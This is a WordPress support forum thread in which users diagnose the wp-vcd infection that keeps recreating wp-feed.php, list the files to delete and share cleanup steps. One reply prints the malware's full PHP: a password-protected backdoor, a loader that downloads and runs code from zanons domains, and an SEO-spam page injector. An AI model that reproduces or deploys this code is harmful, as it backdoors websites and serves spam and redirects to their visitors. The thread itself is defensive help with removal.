Support » Fixing WordPress » wp-feed.php

  • Resolved Rik0399

    (@rik0399)


    Hi,

    I keep getting a message saying ‘../wp-includes/wp-feed.php’ is not part of the wordpress installation in which wordfence suggests its malicious?

    So I delete it and then it automatically re-creates itself?

    Any ideas please?

Viewing 15 replies - 1 through 15 (of 23 total)
  • Moderator James Huff

    (@macmanx)

    Volunteer Moderator

    The report from Wordfence is definitely correct.

    I recommend reporting the problem at https://wordpress.org/support/plugin/wordfence so the plugin’s developers and support community can help you with this.

    Alternatively, carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Hi James and Rik0399,

    We’ve recently discovered this is adware on a site we operate but are having a hard time finding the code responsible. What we do know is that this little bug basically creates the wp-feed.php file and blacklists any IP address that is tied to a logged-in user. So if you log into WordPress on your site, you will no longer see the spam ads.

    However, IP addresses that have never logged into the site will definitely receive the ads and will sometimes be redirected off the site altogether.

    Just thought I’d post in case you guys are able to find the root code responsible. We’re working through our files now hoping to solve the problem.

    Jerod

    Hi,

    Thanks for that,

    I’m working through it all but so far, no joy.

    Try if it’s a WP Rocket action/restoring.

    Hey guys, I’m currently having the same issue on my site, however it is only affecting certain types of users: Only affects windows users for desktop, and affecting all users on mobile / tablet. Have you guys been able to find the root cause / script for this issue?

    Cheers,
    Sam K.

    • This reply was modified 2 years, 10 months ago by itsmrkim.

    Hi Sam,

    I can’t remember/find the exact code that we removed, but it was found in our functions.php file in the theme, and I’m pretty sure the inflicting code was output and visible on the front-end in the source code of our site.

    Hope that helps!

    Jerod

    Hallo Guys,

    I had the same problem today and i sorted the issue by using the plugin Anti-Malware Security and Brute-Force Firewall
    It confirmed the infected file was the functions.php file in the current theme of the website. Some malicious code had been planted there. The plugin removes it and you’re good to go.

    Kindly try it and let others know if worked or not for you.

    All the best.
    M.A

    I found wp-feed.php in my wp-includes directory.
    It is part of a malware infection. That file contains the IP addresses of users who have logged in to the WordPress site. It doesn’t show the injected ads to users who have authenticated.

    The files you should check for and delete:
    wp-feed.php
    wp-vcd.php
    wp-tmp.php
    Multiple copies of class.theme-modules.php
    And remove a bunch of code from the start of all the functions.php files.

    • This reply was modified 2 years, 10 months ago by bmerigan.

    Just for you, replace the hole functions.php in theme folder in your wp-content and anything is fine.

    There you can find some line with “wp-vcd.php”……this would be the malware.

    Cheers.

    Hey,
    I have the same issue and this topic helped me to solve it – thanks!
    Below what is I did:
    – change all your passwords for all your WP’s, FTP, database
    – for each installed WP’s (I had few), go to wp-content/themes/YOURTHEME/functions.php and check, if the front of the code is not suspicious. Mine looks like below:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ac043657a4e80d5afcce1c523ad9e8c0'))
    	{
    $div_code_name="wp_vcd";
    		switch ($_REQUEST['action'])
    			{
    
    				
    
    				case 'change_domain';
    					if (isset($_REQUEST['newdomain']))
    						{
    							
    							if (!empty($_REQUEST['newdomain']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
    
    			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    		                                                                    }
    								}
    						}
    				break;
    
    								case 'change_code';
    					if (isset($_REQUEST['newcode']))
    						{
    							
    							if (!empty($_REQUEST['newcode']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {
    
    			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    		                                                                    }
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    			}
    			
    		die("");
    	}
    
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
    		   {
    		   }
    			else
    			{
    			$tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
    			fwrite($handle, "<?php\n" . $phpCode);
    			}
    			fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
    
    $wp_auth_key='08b370e35d008b6591dd40b0eec23025';
            if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
               
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            }
            
            
            
            
            
        }
    }
    
    //$start_wp_theme_tmp
    
    //wp_tmp
    
    //$end_wp_theme_tmp
    ?><?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '207025345d762fe3f77e7d5b3e5664a5'))
    	{
    		switch ($_REQUEST['action'])
    			{
    				case 'get_all_links';
    					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
    						{
    							$data['code'] = '';
    							
    							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
    								{
    									$data['code'] = $_[1];
    								}
    							
    							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
    						}
    				break;
    				
    				case 'set_id_links';
    					if (isset($_REQUEST['data']))
    						{
    							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
    							
    							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
    							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
    
    							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				case 'create_page';
    					if (isset($_REQUEST['remove_page']))
    						{
    							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
    								{
    									print "true";
    								}
    						}
    					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
    						{
    							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_URL_CD";
    			}
    			
    		die("");
    	}
    
    	
    if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    	{
    		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    		if ($data -> full_content)
    			{
    				print stripslashes($data -> content);
    			}
    		else
    			{
    				print '<!DOCTYPE html>';
    				print '<html ';
    				language_attributes();
    				print ' class="no-js">';
    				print '<head>';
    				print '<title>'.stripslashes($data -> title).'</title>';
    				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
    				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
    				print '<meta name="robots" content="index, follow" />';
    				print '<meta charset="';
    				bloginfo( 'charset' );
    				print '" />';
    				print '<meta name="viewport" content="width=device-width">';
    				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
    				print '<link rel="pingback" href="';
    				bloginfo( 'pingback_url' );
    				print '">';
    				wp_head();
    				print '</head>';
    				print '<body>';
    				print '<div id="content" class="site-content">';
    				print stripslashes($data -> content);
    				get_search_form();
    				get_sidebar();
    				get_footer();
    			}
    			
    		exit;
    	}
    
    ?>

    – delete the maleware beginning
    – go to /wp-includes and check if you have some of those files:

    • wp-tmp.php
    • wp-vcd.php
    • wp-feed.php
    • wp-cd.php

    If yes – check them, they are probably maleware so delete it.
    – check your website if the problem still occurs
    – install Wordfence plugin and check your website once again šŸ˜‰

    hi @pacio88, I have same the problem.

    I check in wp-tmp.php look like this: https://pastebin.com/i68AgRPi

    I read the code, seem this code want to redirect all customer access my site also access their site to increment rank in many another search. setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);.

    I deleted strange code in function.php and wp-tmp.php, wp-vcd.php, wp-feed.php, wp-cd.php. But when F5 my website, it auto-generate wp-tmp.php. Have any method do debug the reason begin from? Any suggestions from you are the solution for me in this case.

    Domain: http://www.zanons.xyz/code.php

    As I said earlier, these files too:

    Multiple copies of class.theme-modules.php
    And remove a bunch of code from the start of all the functions.php files.

    Check ALL of the functions.php files in the theme, and delete ALL of the class.theme-modules.php
    These can be found in multiple locations in a theme. If the theme is loaded before they are all removed then the other files come back.

    @bmerigan, do you know where the problem begins?

    I do not upload my source into hosting, it running on localhost.

    I don’t know the reason why have strange code in function.php.

    Have any method to debug detect any plugin or theme make my source code have strange code?

    I using the theme: Flatsome and WPResidence in ThemeForest (both themes have same issues).

    Plugin same in both theme is: Loco Translate, Yoast SEO.

    My experience was from downloading a theme from a ‘free’ site instead of from the original creator/source.
    The site I got it from was dodgy, and only supplying infected themes.

    My experience was that I installed an infected theme which contained the malicious code and files.

    In my case looks like /ajax-search-pro/includes/functions/class.theme-modules.php is the only location of class.theme-modules.php.

    So the plugin source could be suspicious also as bmerigan says.

Viewing 15 replies - 1 through 15 (of 23 total)
  • The topic ‘wp-feed.php’ is closed to new replies.